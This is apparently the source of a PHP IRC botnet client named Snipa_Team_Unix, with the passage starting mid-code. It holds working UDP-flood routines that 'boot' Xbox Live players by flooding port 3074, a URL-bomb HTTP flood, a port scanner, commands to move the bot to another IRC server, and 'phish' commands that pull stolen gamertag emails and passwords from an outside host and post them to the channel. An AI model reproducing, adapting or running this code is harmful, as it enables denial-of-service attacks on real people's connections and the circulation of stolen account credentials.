$this->privmsg( $this->fuck_you( ),"$blue [".$red."Infected Site Check".$blue."]
» » » ".$red.".site".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Random Nick".$blue."] » » » "
.$red.".randnick".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."URL Bomb".$blue."] » » » ".$r
ed.".urlbomb site.com /path NumberOfRefreshes".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Server Uptime".$blue."] » » »
".$red.".uptime".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Speed Test".$blue."] » » » ".
$red.".speedtest".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Quick UDP-Flood".$blue."] » »
» ".$red.".quick ip".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Check Last Login".$blue."] »
» » ".$red.".lastlogin".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Raw Irc Command".$blue."] » »
» ".$red.".raw command".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Change Command Prefix".$blue.
"] » » » ".$red.".changeprefix newprefix Example: .changeprefix !".$blue." « « «
");
break;
}
case "md5":
{
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$str_md5 = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
$this->privmsg( $this->fuck_you( ), "$blue [ $red MD5 $blue ]: $blue [ ".$red."'
".$str_md5."' ".$blue."EnCoDeS To $red'".md5($str_md5)."' $blue ]" );
break;
}
case "dns":
{
if(isset($mcmd[1]))
{
$ip = ex
plode(".",$mcmd[1]);
if(count
($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1])
&& is_numeric($ip[2]) && is_numeric($ip[3]))
{
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$this->p
rivmsg($this->fuck_you( ),"$leetprefix $blue [ $red DnS $blue ]: $red ".$mcmd[1]
." $blue ReSoLvEs To $leetprefix $red ".gethostbyaddr($mcmd[1]));
}
else
{
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$this->privmsg($this->fuck_you( ),"$blue [ $red DnS
$blue ]: $red ".$mcmd[1]." $blue ReSoLvEs To $red ".gethostbyname($mcmd[1]));
}
}
break;
}
case "exit":
{
fclose( $this->conn );
exit( );
break;
}
case "husk":
{
fclose( $this->conn );
exit( );
break;
}
case "gtfo":
{
fclose( $this->conn );
exit( );
break;
}
case "restart":
{
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$this->privmsg( $this->fuck_you( ), "$leetprefixwhite $red ReStArTinG! $leetsuff
ixwhite $blue Please wait!" );
$this->send( "QUIT :restart command from ".$nick );
fclose( $this->conn );
$this->start();
break;
}
case "lastresort":
{
if( count( $mcmd ) > 3 )
{
$server = $mcmd[1];
$port = $mcmd[2];
$channel = $mcmd[3];
$key = $mcmd[4];

if( $this->using_encode )
{
$this->config[ 'server' ] = base64_encode( $server );
$this->config[ 'chan' ] = base64_encode( str_replace( "#", "", $channel ) );
$this->config[ 'key' ] = base64_encode( $key );
}
else
{
$this->config[ 'server' ] = $server;
$this->config[ 'chan' ] = str_replace( "#", "", $channel );
$this->config[ 'key' ] = $key;
}

$this->config[ 'port' ] = $port;


$this->privmsg( $this->fuck_you( ), "[ moveserver ] ".$server." => ".$port." =>
".$channel." => ".$key );
$this->send( "QUIT :moveserver command from ".$nick );

fclose( $this->conn );
$this->start();
}
break;
}
case "whois":
{
$param2 = $mcmd[1];
if( !empty( $param2 ) )
{
//do it
//http://www.geoip.co.uk/?IP
=98.214.115.193&submit.x=23&submit.y=11
$fp = fsockopen( "geoip.co.u
k", 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /?IP=$param2
&submit.x=23&submit.y=11 HTTP/1.1\r\n";
$out .= "Host: geoip.co.
uk\r\n";
$out .= "Keep-Alive: 300
\r\n";
$out .= "Connection: kee
p-alive\r\n\r\n";
fwrite( $fp, $out );
$whodata = '';
while(!feof($fp))
{
/*do nothing*/
$whodata .= fread( $
fp, 1024 );
}
$countryc = explode( "
:", $whodata );
$countryc = explode( "
: <img src=", $countryc[1] );
$country = strip_tags( $
countryc[0] );
$statec = explode( "$cou
ntryc", $whodata );
$statec = explode( "
<br>", $statec[1] );
$state = strip_tags( $st
atec[0] );
$cityc = explode( "$stat
ec", $whodata );
$cityc = explode( "
: <img src=", $cityc[1] );
$city = strip_tags( $cit
yc[0] );
fclose( $fp );
$leetprefixwhite = $this
->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$this->privmsg( $this->f
uck_you( ), "$leetprefixwhite $red $param2 $leetsuffixwhite - $red Country - $bl
ue $country" );
$this->privmsg( $this->f
uck_you( ), "$leetprefixwhite $red $param2 $leetsuffixwhite - $red City - $blue
$city" );
$this->privmsg( $this->f
uck_you( ), "$leetprefixwhite $red $param2 $leetsuffixwhite - $red State - $blue
$state" );
}else{
$this->privmsg( $this->f
uck_you( ), "[ whois ] Error: $errstr" );
}
}
else
{
$this->privmsg( $this->fuck_
you( ), "[ whois ] Invalid params, use .whois <ip/host>" );
}
break;
}
case "phish":
{
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand3' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$param2 = $random_number;
if( !empty( $param2 ) )
{
$fp = fsockopen( "thumbscafe
.net", 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /xbox/q23b68
dq2vo3dvoqe5v7o5v7oq2.txt HTTP/1.1\r\n";
$out .= "Host: thumbscaf
e.net\r\n";
$out .= "Keep-Alive: 300
\r\n";
$out .= "Connection: kee
p-alive\r\n\r\n";
fwrite( $fp, $out );
$whodata = '';
while(!feof($fp))
{
/*do nothing*/
$whodata .= fread( $
fp, 1024 );
}
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand3' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$gamertagc = explode( "E
XP: $random_number", $whodata );
$gamertagc = explode( "E
mail: ", $gamertagc[1] );
$gamertag = strip_tags(
$gamertagc[0] );

$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$emailc = explode( "$gam
ertag", $whodata );
$emailc = explode( "Pass
word: ", $emailc[1] );
$email = strip_tags( $em
ailc[0] );
$email2 = "$part1 Phishe
r $part2 $email ";

$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$passwordc = explode( "$
email", $whodata );
$passwordc = explode( "-
-----", $passwordc[1] );
$password = strip_tags(
$passwordc[0] );
$password2 = "$part1 Phi
sher $part2 $password";
fclose( $fp );
$leetprefixwhite = $this
->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$this->privmsg( $this->f
uck_you( ), "$email2" );
$this->privmsg( $this->f
uck_you( ), "$password2" );
}else{
$this->privmsg( $this->f
uck_you( ), "$leetprefixwhite$red Error! $leetsuffixwhite" );
}
}
else
{
$leetsuffixwhite = $this
->config['leetsuffixwhite'];
$leetprefixwhite = $this
->config['leetprefixwhite'];
$blue = $this->config['b
lue'];
$this->privmsg( $this->fuck_
you( ), "".$blue."[$leetprefixwhite$red Phish $leetsuffixwhite$blue] $red Are yo
u retarded? This command is used like this - $blue ~phish randomnumbergoeshere."
);
}
break;
}
case "phish2":
{
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand4' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$param2 = $random_number;
if( !empty( $param2 ) )
{
$fp = fsockopen( "thumbscafe
.net", 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /xbox/q23b68
dq2vo3dvoqe5v7o5v7oq2.txt HTTP/1.1\r\n";
$out .= "Host: thumbscaf
e.net\r\n";
$out .= "Keep-Alive: 300
\r\n";
$out .= "Connection: kee
p-alive\r\n\r\n";
fwrite( $fp, $out );
$whodata = '';
while(!feof($fp))
{
/*do nothing*/
$whodata .= fread( $
fp, 1024 );
}
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand4' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$gamertagc = explode( "E
XP: $random_number", $whodata );
$gamertagc = explode( "E
mail: ", $gamertagc[1] );
$gamertag = strip_tags(
$gamertagc[0] );

$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$emailc = explode( "$gam
ertag", $whodata );
$emailc = explode( "Pass
word: ", $emailc[1] );
$email = strip_tags( $em
ailc[0] );
$email2 = "$part1 Phishe
r $part2 $email ";
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$passwordc = explode( "$
email", $whodata );
$passwordc = explode( "-
-----", $passwordc[1] );
$password = strip_tags(
$passwordc[0] );
$password2 = "$part1 Phi
sher $part2 $password";
fclose( $fp );
$leetprefixwhite = $this
->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$this->privmsg( $this->f
uck_you( ), "$email2" );
$this->privmsg( $this->f
uck_you( ), "$password2" );
}else{
$this->privmsg( $this->f
uck_you( ), "$leetprefixwhite$red Error! $leetsuffixwhite" );
}
}
else
{
$leetsuffixwhite = $this
->config['leetsuffixwhite'];
$leetprefixwhite = $this
->config['leetprefixwhite'];
$blue = $this->config['b
lue'];
$this->privmsg( $this->fuck_
you( ), "".$blue."[$leetprefixwhite$red Phish $leetsuffixwhite$blue] $red Are yo
u retarded? This command is used like this - $blue ~phish randomnumbergoeshere."
);
}
break;
}
case "update.check":
{
$param2 = check;
if( !empty( $param2 ) )
{
$fp = fsockopen( "mommy-bel.
com", 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /belblog/ima
ges/update.txt HTTP/1.1\r\n";
$out .= "Host: mommy-bel
.com\r\n";
$out .= "Keep-Alive: 300
\r\n";
$out .= "Connection: kee
p-alive\r\n\r\n";
fwrite( $fp, $out );
$whodata = '';
while(!feof($fp))
{
$whodata .= fread( $
fp, 1024 );
}
$updatec = explode( "$pa
ram2 ", $whodata );
$updatec = explode( " bu
sk", $updatec[1] );
$update = strip_tags( $u
pdatec[0] );
fclose( $fp );
$leetprefixwhite = $this
->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$version = $this->config['version'];
if ( $update == $version )
{
$this->privmsg( $this->fuck_you( ), "$leetprefixwhite$red Update $leetsuffixwhit
e$blue You have the Latest Version! (Version $version)" );
break;
}
else
$this->privmsg( $this->f
uck_you( ), "$leetprefixwhite$red Update $leetsuffixwhite$blue There is an Updat
e Available (Version $update)! Type".$red." .installupdate".$blue." to get it!"
);
break;
}
}
}

case "join":
{
$channel = $mcmd[1];
$key = $mcmd[2];
$this->join( $channel, $key );
break;
}
case "part":
{
$this->send( "PART ".$mcmd[1] );
}
case "msg":
{
$person = $mcmd[1];
$text = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
$this->privmsg( $person, $text );
break;
}
case "pscan":
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$blue = $this->config['blue'];
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->fuck_you( ),"$leetpre
fix $blue GoW XbL PoRt ScAn $leetsuffixred : $red ".$mcmd[1].":".$mcmd[2]." $blu
e is OPEN !");
else
$this->privmsg($this->fuck_you( ),"$leetpre
fix $blue GoW XbL PoRt ScAn $leetsuffixred : $blue ".$mcmd[1].":".$mcmd[2]." $re
d is CLOSED !");
break;
}
case "software":
{
$this->privmsg( $this->fuck_you( ), $_SERVER[ 'SERVER_SOFTWARE' ] );
break;
}
case "ju
stcallmecody":
{
$youtube = $this->config['youtube'];
$this->p
rivmsg($this->fuck_you( ), $youtube );
break;
}
case "ja
cob":
{
$this->p
rivmsg($this->fuck_you( ), "[8:02pm] <Jacob> i going to say this only onces [8:0
3pm] <Jacob> im a stank hoe" );
break;
}
case "site":
{
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$ipzzz = ( $_SERVER["HTTP_HOST"] );
$this->privmsg( $this->fuck_you( ), "$blue This bot is running on $leetprefixwhi
te $red $ipzzz $leetsuffixwhite" );
break;
}
case "randnick":
{
$this->set_nick();
break;
}
case "logout":
{
$logoutmsg = $this->messages['logoutmsg'];
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$part2 = $this->config['part2'];
$this->remove_auth( $host );
$this->privmsg( $this->fuck_you( ), "$logoutmsg $leetprefixwhite $red$nick $leet
suffixwhite $part2" );
break;
}
case "urlbomb":
{
$this->urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] );
break;
}
case "udpflood":
{
if( count( $mcmd
) > 3 )
{
$this->u
dpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
}
case "stop":
{
fclose($fp);
break;
}
case "xblflood":
{
if( count( $mcmd
) > 4 )
{;
$this->u
dpflood4($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]);
}
break;
}
case "speedtest":
{
$this->u
dpflood3(hi,650000,5);
break;
}
case "2players":
{
$this->u
dpflood5($mcmd[1],$mcmd[2]);
break;
}
case "3players":
{
$this->u
dpflood7($mcmd[1],$mcmd[2],$mcmd[3]);
break;
}
case "4players":
{
$this->u
dpflood6($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]);
break;
}
case "quick":
{
if( count( $mcmd
) > 1 )
{
$this->u
dpflood2($mcmd[1],65000,60);
}
break;
}
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function scanport( $host, $port )
{
if( fsockopen( $host, $port, $e, $s ) )
{
return 1;
}
return 0;
}
function urlbomb( $host, $path, $times, $mode = 0 )
{
if( !isset( $host ) || !isset( $path ) || !isset( $times
) )
return;
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$http = "http://";
$this->privmsg( $this->fuck_you( ),"$leetprefixwhite $re
d URLbomb started! $leetsuffixwhite on $red [ $blue ".$http."".$host."".$path."
$red ]");
$success = 0;
for( $i = 0; $i < $times; $i++ )
{
$fp = fsockopen( $host, 80, $errno, $errstr, 30
);
if( $fp )
{
$out = "GET /".$path." HTTP/1.1\r\n";
$out .= "Host: ".$host."\r\n";
$out .= "Keep-Alive: 300\r\n";
$out .= "Connection: keep-alive\r\n\r\n"
;
fwrite( $fp, $out );
if( $mode != 0 )
{
while(!feof($fp)){/*do nothing*/
}
}
fclose( $fp );
$success++;
}
}
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$http = "http://";
$this->privmsg( $this->fuck_you( ),"$leetprefixwhite $re
d URLbomb finished! $leetsuffixwhite $blue on $red [ $blue ".$http."".$host."".$
path." $red ] $blue [$red Times Visited: $blue ".$success." $blue ]" );
}
function udpflood2( $host, $packetsize, $time )
{
$udpmsgfast = $this->messages['udpmsgfast'];
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['red'];
$this->privmsg( $this->fuck_you( ),"$udpmsgfast Started
On $leetprefixwhite$red $host $leetsuffixwhite" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1
,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$xboxlive = "3074";
$fp=fsockopen("udp://".$host,$xboxlive,$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$fag = "$udpmsgfast - Sent Total $leetprefixwhite$red $e
nv Megabytes $leetsuffixwhite$red With A Speed Of $leetprefixwhite$red $vel Mega
Bytes/Second $leetsuffixwhite";
$this->privmsg( $this->fuck_you( ),"$fag$fag2" );
$this->ex('echo 1 >> cache.dat');
}
function udpflood3( $host, $packetsize, $time )
{
$leetprefixwhite = $this->config['leetprefixwhite'];
$speedtest = $this->messages['speedtest'];
$speedtestfin = $this->messages['speedtestfin'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['red'];
$green = $this->config['green'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$this->privmsg( $this->fuck_you( ),"$part1$red SpeeD Tes
T StarteD! $part2 - $blue Please Wait!" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1
,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$xboxlive = "3074";
$fp=fsockopen("udp://".$host,$xboxlive,$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$red = $this->config['red'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['red'];
$fag = "$part1$red SpeeD TesT CompletE! $part2 - $blue T
his bot hits at".$red." $vel MegaBytes/Second";
$this->privmsg( $this->fuck_you( ),"$fag$fag2" );
$this->ex('echo 1 >> cache.dat');
}
function udpflood5( $host, $crack )
{
$packetsize = "65000";
$time = "60";
$port = "3074";
$leetprefixwhite = $this->config['leetprefixwhite'];
$speedtest = $this->messages['speedtest'];
$speedtestfin = $this->messages['speedtestfin'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['red'];
$green = $this->config['green'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$this->privmsg( $this->fuck_you( ),"$part1$red TwO Playe
R DDoS $part2 - $blue Booting $host and $crack! Attacking on port $port" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1
,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$port = "3074";
$fp=fsockopen("udp://".$host,$port,$e,$s,5);
$fp2=fsockopen("udp://".$crack,$port,$e,$s,5);
fwrite($fp,$packet);
fwrite($fp2,$packet);
fclose($fp);
fclose($fp2);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$red = $this->config['red'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['red'];
$fag = "$part1$red TwO PlayeR DDoS! $part2 - $blue $host
and $crack are offline! ".$red." $vel MegaBytes/Second";
$this->privmsg( $this->fuck_you( ),"$fag$fag2" );
$this->ex('echo 1 >> cache.dat');
}
function udpflood6( $host, $crack, $herion, $coke )
{
$packetsize = "65000";
$time = "60";
$port = "3074";
$leetprefixwhite = $this->config['leetprefixwhite'];
$speedtest = $this->messages['speedtest'];
$speedtestfin = $this->messages['speedtestfin'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['red'];
$green = $this->config['green'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$this->privmsg( $this->fuck_you( ),"$part1$red 4 Player
DDoS! $part2 - $blue Booting $host, $crack, $herion, and $coke! Attacking on por
t $port" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1
,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$port = "3074";
$fp=fsockopen("udp://".$host,$port,$e,$s,5);
$fp2=fsockopen("udp://".$crack,$port,$e,$s,5);
$fp3=fsockopen("udp://".$herion,$port,$e,$s,5);
$fp4=fsockopen("udp://".$coke,$port,$e,$s,5);
fwrite($fp,$packet);
fwrite($fp2,$packet);
fwrite($fp3,$packet);
fwrite($fp4,$packet);
fclose($fp);
fclose($fp2);
fclose($fp3);
fclose($fp4);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$red = $this->config['red'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['red'];
$fag = "$part1$red 4 Player DDoS CompletE! $part2 - $blu
e $host, $crack, $herion, and $coke are ALL offline! ".$red." $vel MegaBytes/Sec
ond";
$this->privmsg( $this->fuck_you( ),"$fag$fag2" );
$this->ex('echo 1 >> cache.dat');
}
function udpflood7( $stoner, $allalone, $daynnite )
{
$packetsize = "65000";
$time = "60";
$port = "3074";
$leetprefixwhite = $this->config['leetprefixwhite'];
$speedtest = $this->messages['speedtest'];
$speedtestfin = $this->messages['speedtestfin'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['red'];
$green = $this->config['green'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$this->privmsg( $this->fuck_you( ),"$part1$red 3 Player
DDoS! $part2 - $blue Booting $stoner, $allalone, and $daynnite! Attacking on por
t $port" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1
,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$port = "3074";
$fp2=fsockopen("udp://".$stoner,$port,$e,$s,5);
$fp3=fsockopen("udp://".$allalone,$port,$e,$s,5)
;
$fp4=fsockopen("udp://".$daynnite,$port,$e,$s,5)
;
fwrite($fp2,$packet);
fwrite($fp3,$packet);
fwrite($fp4,$packet);
fclose($fp2);
fclose($fp3);
fclose($fp4);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$red = $this->config['red'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['red'];
$fag = "$part1$red 3 Player DDoS CompletE! $part2 - $blu
e $stoner, $allalone, and $daynnite are now offline offline! ".$red." $vel MegaB
ytes/Second";
$this->privmsg( $this->fuck_you( ),"$fag$fag2" );
$this->ex('echo 1 >> cache.dat');
}

function udpflood( $host, $packetsize, $time )


{
$udpmsg = $this->messages['udpmsg'];
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['red'];
$this->privmsg( $this->fuck_you( ),"$udpmsg Started On $
leetprefixwhite$red $host $leetsuffixwhite for $leetprefixwhite$red $time Second
s $leetsuffixwhite$red With $leetprefixwhite$red $packetsize Packets $leetsuffix
white" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1
,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,
$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$fag = "$udpmsg - Sent Total $leetprefixwhite$red $env M
egabytes $leetsuffixwhite$red With A Speed Of $leetprefixwhite$red $vel MegaByte
s/Second $leetsuffixwhite";
$this->privmsg( $this->fuck_you( ),"$fag$fag2" );
$this->ex('echo 1 >> cache.dat');
}
function udpflood4( $host, $packetsize, $time, $port )
{
$udpmsg = $this->messages['udpmsg'];
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['red'];
$this->privmsg( $this->fuck_you( ),"$udpmsg Started On $
leetprefixwhite$red $host $leetsuffixwhite for $leetprefixwhite$red $time Second
s $leetsuffixwhite$red With $leetprefixwhite$red $packetsize Packets $leetsuffix
white$red On port $leetprefixwhite$red $port $leetsuffixwhite" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1
,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$fp=fsockopen("udp://".$host,$port,$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$fag = "$udpmsg - Sent Total $leetprefixwhite$red $env M
egabytes $leetsuffixwhite$red With A Speed Of $leetprefixwhite$red $vel MegaByte
s/Second $leetsuffixwhite On Port $leetprefixwhite$red $port $leetsuffixwhite";
$this->privmsg( $this->fuck_you( ),"$fag$fag2" );
$this->ex('echo 1 >> cache.dat');
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function set_nick()
{
$prefix .= "[UniX|";
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$this->nick = sprintf( $prefix.$this->config[ 'nickform'
], $random_number );
$this->send("NICK ".$this->nick);
}
function busk_nick()
{
$prefix .= "[RooT|LinuX|";
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$this->nick = sprintf( $prefix.$this->config[ 'nickform2
' ], $random_number );
$this->send("NICK ".$this->nick);
}
function nzm_nick()
{
$prefix .= "[USA|";
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$fucku = "$this->config[ 'prfix' ]";
$this->nick = sprintf( $prefix.$this->config['prfix'], $
random_number );
$this->send("NICK ".$this->nick);
}
function parse_url_s( $url )
{
$URLpcs = ( parse_url( $url ) );
$PathPcs = explode( "/", $URLpcs['path'] );
$URLpcs['file'] = end( $PathPcs );
unset( $PathPcs[ key( $PathPcs ) ] );
$URLpcs['dir'] = implode("/",$PathPcs);
$fileext = explode( '.', $URLpcs['file'] );
if(count($fileext))
{
$URLpcs['file_ext'] = $fileext[ count( $fileext
) - 1 ];
}
return ($URLpcs);
}
}
$bot = new Snipa_Team_Unix;
$bot->start();
?>

Vous aimerez peut-être aussi